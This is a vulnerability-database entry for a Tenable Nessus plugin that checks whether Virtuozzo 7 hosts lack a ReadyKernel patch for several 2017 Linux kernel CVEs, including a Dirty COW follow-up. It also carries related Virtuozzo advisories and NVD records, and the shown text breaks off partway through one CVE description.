Search...

Virtuozzo 7 : readykernel-patch (VZA-2017-111)

2017-12-12T00:00:00

ID VIRTUOZZO_VZA-2017-111.NASL
Type nessus
Reporter This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2017-12-12T00:00:00

Description

According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerabilities :

dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.

The Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.

A flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.

A vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.

Note that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(105167);
  script_version("3.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id(
    "CVE-2017-1000405",
    "CVE-2017-1000407",
    "CVE-2017-16939",
    "CVE-2017-8824"
  );

  script_name(english:"Virtuozzo 7 : readykernel-patch (VZA-2017-111)");
  script_summary(english:"Checks the readykernel output for the updated patch.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Virtuozzo host is missing a security update.");
  script_set_attribute(attribute:"description", value:
"According to the version of the vzkernel package and the
readykernel-patch installed, the Virtuozzo installation on the remote
host is affected by the following vulnerabilities :

  - dccp_disconnect() set the socket state to DCCP_CLOSED
    but did not properly free some of the resources
    associated with that socket. This could result in a
    use-after-free and could potentially allow an attacker
    to escalate their privileges.

  - The Linux kernel is vulnerable to a use-after-free
    issue. It could occur while closing a xfrm netlink
    socket, in xfrm_dump_policy_done. A user/process could
    use this flaw to potentially escalate their privileges
    on a system.

  - A flaw was found in the patches used to fix the 'Dirty
    COW' vulnerability (CVE-2016-5195). An attacker, able
    to run local code, can exploit a race condition in
    transparent huge pages to modify usually read-only huge
    pages.

  - A vulnerability was found in the kernel virtualization
    module (KVM) for the Intel processors. A guest system
    could flood the I/O port 0x80 with write requests,
    which could crash the host kernel, resulting in DoS.

Note that Tenable Network Security has extracted the preceding
description block directly from the Virtuozzo security advisory.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.");
  script_set_attribute(attribute:"see_also", value:"https://help.virtuozzo.com/customer/portal/articles/2909951");
  # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?25634872");
  script_set_attribute(attribute:"solution", value:"Update the readykernel patch.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"patch_publication_date", value:"2017/12/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/12");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:readykernel");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:virtuozzo:virtuozzo:7");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Virtuozzo Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Virtuozzo/release", "Host/Virtuozzo/rpm-list", "Host/readykernel-info");

  exit(0);
}

include("global_settings.inc");
include("readykernel.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/Virtuozzo/release");
if (isnull(release) || "Virtuozzo" &gt;!&lt; release) audit(AUDIT_OS_NOT, "Virtuozzo");
os_ver = pregmatch(pattern: "Virtuozzo Linux release ([0-9]+\.[0-9])(\D|$)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Virtuozzo");
os_ver = os_ver[1];
if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Virtuozzo 7.x", "Virtuozzo " + os_ver);

if (!get_kb_item("Host/Virtuozzo/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Virtuozzo", cpu);

rk_info = get_kb_item("Host/readykernel-info");
if (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, "Virtuozzo");

checks = make_list2(
  make_array(
    "kernel","vzkernel-3.10.0-693.1.1.vz7.37.30",
    "patch","readykernel-patch-37.30-39.1-2.vl7"
  )
);
readykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:"Virtuozzo-7");

JSON Vulners Source

Initial Source

{"id": "VIRTUOZZO_VZA-2017-111.NASL", "bulletinFamily": "scanner", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-111)", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2017-12-12T00:00:00", "modified": "2017-12-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/105167", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?25634872", "https://help.virtuozzo.com/customer/portal/articles/2909951"], "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "type": "nessus", "lastseen": "2021-01-06T09:13:20", "edition": 31, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "virtuozzo", "idList": ["VZA-2017-113", "VZA-2018-004", "VZA-2017-110", "VZA-2017-111", "VZA-2017-109", "VZA-2017-114"]}, {"type": "cve", "idList": ["CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000407", "CVE-2017-1000405", "CVE-2017-8824"]}, {"type": "nessus", "idList": ["VIRTUOZZO_VZA-2017-114.NASL", "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "UBUNTU_USN-3510-1.NASL", "SUSE_SU-2017-3226-1.NASL", "PHOTONOS_PHSA-2017-1_0-0093_LINUX.NASL", "VIRTUOZZO_VZA-2017-109.NASL", "VIRTUOZZO_VZA-2018-004.NASL", "SUSE_SU-2017-3225-1.NASL", "UBUNTU_USN-3511-1.NASL", "VIRTUOZZO_VZA-2017-110.NASL"]}, {"type": "attackerkb", "idList": ["AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-5195"]}, {"type": "seebug", "idList": ["SSV:96908"]}, {"type": "f5", "idList": ["SOL10558632", "F5:K15526101", "F5:K10558632", "F5:K81158013"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3226-1", "SUSE-SU-2017:3225-1", "SUSE-SU-2017:3285-1", "SUSE-SU-2017:3324-1", "SUSE-SU-2017:3319-1", "SUSE-SU-2017:3297-1", "SUSE-SU-2017:3317-1", "SUSE-SU-2017:3300-1", "SUSE-SU-2017:3314-1", "SUSE-SU-2017:3284-1"]}, {"type": "ubuntu", "idList": ["USN-3511-1", "USN-3510-1", "USN-3507-2", "USN-3510-2", "USN-3509-2", "USN-3509-4", "USN-3509-3", "USN-3508-2", "USN-3508-1", "USN-3509-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843403", "OPENVAS:1361412562310843400", "OPENVAS:1361412562310873860", "OPENVAS:1361412562310843393", "OPENVAS:1361412562310843397", "OPENVAS:1361412562310873857", "OPENVAS:1361412562310843394", "OPENVAS:1361412562310843402", "OPENVAS:1361412562310843396", "OPENVAS:1361412562310843398"]}, {"type": "threatpost", "idList": ["THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087"]}, {"type": "redhat", "idList": ["RHSA-2018:0180", "RHSA-2018:0399"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F867C230BBE8FA4BCFE72E04CBAC881F", "EXPLOITPACK:21E02FD686B4E07E01D154BAF895DE82", "EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:43234", "EDB-ID:44305", "EDB-ID:43199", "EDB-ID:44049"]}, {"type": "fedora", "idList": ["FEDORA:22E2B607603F", "FEDORA:3CCDE601B23D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145235"]}, {"type": "zdt", "idList": ["1337DAY-ID-29141"]}, {"type": "amazon", "idList": ["ALAS-2017-937"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4131"]}], "modified": "2021-01-06T09:13:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-06T09:13:20", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105167);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-111)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909951\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25634872\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "naslFamily": "Virtuozzo Local Security Checks", "pluginID": "105167", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}

{"virtuozzo": [{"lastseen": "2019-11-05T11:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-693.1.1.vz7.37.30 (Virtuozzo 7.0.6).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-111", "href": "https://help.virtuozzo.com/customer/portal/articles/2909951", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-110", "href": "https://help.virtuozzo.com/customer/portal/articles/2909950", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3)\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-109", "href": "https://help.virtuozzo.com/customer/portal/articles/2909949", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.2 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.42.0.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.42.0.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-8824\nA vulnerability was found in DCCP socket handling code. dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-15129\nThe function get_net_ns_by_id() does not check the net.count value when processing a peer network, which could lead to double free and memory corruption. An unprivileged local user could use this vulnerability to crash the system.\n\n**Vulnerability id:** CVE-2017-18017\nIf the system uses iptables and there are iptables rules with TCPMSS action there, a remote attacker could cause a denial of service (use-after-free in tcpmss_mangle_packet function leading to memory corruption) or possibly have unspecified other impact by sending specially crafted network packets.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, could exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2018-01-12T00:00:00", "published": "2018-01-12T00:00:00", "id": "VZA-2018-004", "href": "https://help.virtuozzo.com/customer/portal/articles/2915392", "title": "Important kernel security update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 42.0 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "description": "This update provides a new Virtuozzo 6.0 kernel 2.6.32-042stab126.2 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n", "edition": 1, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "VZA-2017-114", "href": "https://help.virtuozzo.com/customer/portal/articles/2910907", "title": "Important kernel security update: CVE-2017-8824 and other; new kernel 2.6.32-042stab126.2, Virtuozzo 6.0 Update 12 Hotfix 19 (6.0.12-3689)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "description": "This update provides a new Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 kernel 2.6.32-042stab126.2 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n", "edition": 1, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "VZA-2017-113", "href": "https://help.virtuozzo.com/customer/portal/articles/2910906", "title": "Important kernel security update: CVE-2017-8824 and other; new kernel 2.6.32-042stab126.2 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.", "edition": 18, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-12-11T21:29:00", "title": "CVE-2017-1000407", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000407"], "modified": "2019-05-14T22:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:linux:linux_kernel:4.15", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:redhat:virtualization_host:4.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-1000407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000407", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty 